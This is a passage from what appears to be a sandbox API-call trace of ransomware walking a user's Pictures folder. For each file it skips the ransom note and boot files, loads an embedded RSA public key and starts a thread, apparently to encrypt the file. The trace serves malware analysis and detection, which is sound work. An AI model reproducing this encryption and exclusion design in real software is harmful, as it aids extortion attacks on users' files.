(lpString1="1698FA38038EB2CD51213BC807C39715.XZZX", lpString2=".") returned 1 [0190.098] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0190.098] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="ntldr") returned 0x0 [0190.098] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="NTLDR") returned 0x0 [0190.099] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0190.099] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="ntdetect.com") returned 0x0 [0190.099] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0190.099] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0190.099] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.099] lstrcpyW (in: lpString1=0x17cf1c, lpString2="1698FA38038EB2CD51213BC807C39715.XZZX" | out: lpString1="1698FA38038EB2CD51213BC807C39715.XZZX") returned="1698FA38038EB2CD51213BC807C39715.XZZX" [0190.099] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc88 [0190.099] Sleep (dwMilliseconds=0x96) [0190.247] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.247] lstrcmpW (lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpString2="..") returned 1 [0190.247] lstrcmpW (lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpString2=".") returned 1 [0190.247] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0190.247] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="ntldr") returned 0x0 [0190.247] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="NTLDR") returned 0x0 [0190.247] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0190.247] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0190.247] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0190.247] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0190.248] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.248] lstrcpyW (in: lpString1=0x17cf1c, lpString2="1971D3BF09924C93CB17194F0DC730DB.XZZX" | out: lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX") returned="1971D3BF09924C93CB17194F0DC730DB.XZZX" [0190.248] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc8c [0190.248] Sleep (dwMilliseconds=0x96) [0190.511] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.511] lstrcmpW (lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpString2="..") returned 1 [0190.511] lstrcmpW (lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpString2=".") returned 1 [0190.511] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0190.511] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="ntldr") returned 0x0 [0190.511] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="NTLDR") returned 0x0 [0190.511] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0190.511] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="ntdetect.com") returned 0x0 [0190.511] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0190.511] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0190.512] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.512] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2187C5602F1ADAF08D4383D0333BBF38.XZZX" | out: lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned="2187C5602F1ADAF08D4383D0333BBF38.XZZX" [0190.512] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc90 [0190.512] Sleep (dwMilliseconds=0x96) [0190.654] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.654] lstrcmpW (lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpString2="..") returned 1 [0190.654] lstrcmpW (lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpString2=".") returned 1 [0190.654] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0190.654] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="ntldr") returned 0x0 [0190.654] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="NTLDR") returned 0x0 [0190.654] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0190.654] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="ntdetect.com") returned 0x0 [0190.654] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0190.654] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0190.654] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.654] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" | out: lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" [0190.654] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc94 [0190.655] Sleep (dwMilliseconds=0x96) [0190.809] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.809] lstrcmpW (lpString1="4EC1B3383CF01EB849835EF241110300.XZZX", lpString2="..") returned 1 [0190.809] lstrcmpW (lpString1="4EC1B3383CF01EB849835EF241110300.XZZX", lpString2=".") returned 1 [0190.809] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0190.809] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="ntldr") returned 0x0 [0190.809] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="NTLDR") returned 0x0 [0190.809] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0190.809] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="ntdetect.com") returned 0x0 [0190.809] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0190.809] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0190.809] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.810] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4EC1B3383CF01EB849835EF241110300.XZZX" | out: lpString1="4EC1B3383CF01EB849835EF241110300.XZZX") returned="4EC1B3383CF01EB849835EF241110300.XZZX" [0190.810] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc98 [0190.810] Sleep (dwMilliseconds=0x96) [0190.965] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0190.965] lstrcmpW (lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX", lpString2="..") returned 1 [0190.965] lstrcmpW (lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX", lpString2=".") returned 1 [0190.965] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0190.965] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="ntldr") returned 0x0 [0190.965] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="NTLDR") returned 0x0 [0190.965] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0190.965] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0190.965] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0190.965] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0190.965] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.965] lstrcpyW (in: lpString1=0x17cf1c, lpString2="567FB4290F0A7CE338C9770B132B612B.XZZX" | out: lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX") returned="567FB4290F0A7CE338C9770B132B612B.XZZX" [0190.966] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.966] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc9c [0190.966] Sleep (dwMilliseconds=0x96) [0191.121] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0191.121] lstrcmpW (lpString1="5C36794D2643414F2FE671172A8D2597.XZZX", lpString2="..") returned 1 [0191.121] lstrcmpW (lpString1="5C36794D2643414F2FE671172A8D2597.XZZX", lpString2=".") returned 1 [0191.121] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0191.121] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="ntldr") returned 0x0 [0191.121] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="NTLDR") returned 0x0 [0191.121] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0191.121] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="ntdetect.com") returned 0x0 [0191.121] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0191.121] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0191.122] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.122] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5C36794D2643414F2FE671172A8D2597.XZZX" | out: lpString1="5C36794D2643414F2FE671172A8D2597.XZZX") returned="5C36794D2643414F2FE671172A8D2597.XZZX" [0191.122] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xca0 [0191.122] Sleep (dwMilliseconds=0x96) [0191.277] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0191.277] lstrcmpW (lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpString2="..") returned 1 [0191.277] lstrcmpW (lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpString2=".") returned 1 [0191.277] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0191.277] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="ntldr") returned 0x0 [0191.277] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="NTLDR") returned 0x0 [0191.277] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0191.277] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0191.277] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0191.277] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0191.278] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.278] lstrcpyW (in: lpString1=0x17cf1c, lpString2="609D61282FED0EE4AFD8291A340DF32C.XZZX" | out: lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX") returned="609D61282FED0EE4AFD8291A340DF32C.XZZX" [0191.278] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xca4 [0191.278] Sleep (dwMilliseconds=0x96) [0191.433] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0191.433] lstrcmpW (lpString1="615936DC32228B708230065136576FB8.XZZX", lpString2="..") returned 1 [0191.433] lstrcmpW (lpString1="615936DC32228B708230065136576FB8.XZZX", lpString2=".") returned 1 [0191.433] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", 